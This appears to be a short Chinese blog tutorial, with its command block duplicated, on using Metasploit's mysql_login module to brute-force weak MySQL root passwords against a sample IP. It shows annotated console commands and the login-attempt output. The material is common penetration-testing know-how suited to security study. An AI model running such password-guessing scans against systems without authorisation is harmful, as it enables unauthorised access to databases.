Metasploit扫描Mysql弱口令
2014-09-01 17:30
323 查看
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库
[*] Rebuilding the module cache in the background...
msf > db_status 查看数据库连接状态
[*] postgresql connected to msf3
msf > use auxiliary/scanner/mysql/mysql_login 加载扫描模块
msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3 目标IP地址
RHOSTS => 1.5.5.3
msf auxiliary(mysql_login) > set USERNAME root 目标用户名 一般为root
USERNAME => root
msf auxiliary(mysql_login) > set
PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt 密码字典路劲,路劲随意填写
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf auxiliary(mysql_login) > exploit 开始扫描
[*] 1.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16
[*] 1.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”
[*] 1.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”
[*] 1.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’
[*] 1.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’
[*] 1.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’
[*] 1.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’
[*] 1.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’
能否扫描出来主要看密码字典
[*] Rebuilding the module cache in the background...
msf > db_status 查看数据库连接状态
[*] postgresql connected to msf3
msf > use auxiliary/scanner/mysql/mysql_login 加载扫描模块
msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3 目标IP地址
RHOSTS => 1.5.5.3
msf auxiliary(mysql_login) > set USERNAME root 目标用户名 一般为root
USERNAME => root
msf auxiliary(mysql_login) > set
PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt 密码字典路劲,路劲随意填写
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf auxiliary(mysql_login) > exploit 开始扫描
[*] 1.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16
[*] 1.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”
[*] 1.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”
[*] 1.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’
[*] 1.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’
[*] 1.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’
[*] 1.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’
[*] 1.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’
能否扫描出来主要看密码字典
相关文章推荐
- metasploit扫描mysql口令简介
- metasploit扫描MySQL用户名和密码
- Metasploit学习三常见的服务扫描与口令猜解
- Mysql如何避免全表扫描
- MySQL忘记超级用户口令的解决办法
- 如何恢复MYSQL的ROOT口令
- MySQL用户Root密码为弱口令的攻击
- 由mysql弱口令取得system权限的实战
- PHP+MYSQL网站注入扫描
- Mysql如何避免全表扫描的方法
- MYSQL用户root密码为弱口令的攻击
- 恢复mysql的登录口令
- 解决办法之MySQL忘记超级用户口令
- MySQL 忘记口令的解决办法
- 忘了mysql的root口令怎么办??
- MYSQL用户root密码为弱口令的攻击
- MYSQL 降序索引和减轻索引扫描
- MySQL忘记超级用户口令的解决办法
- MySQL: 怎样设置口令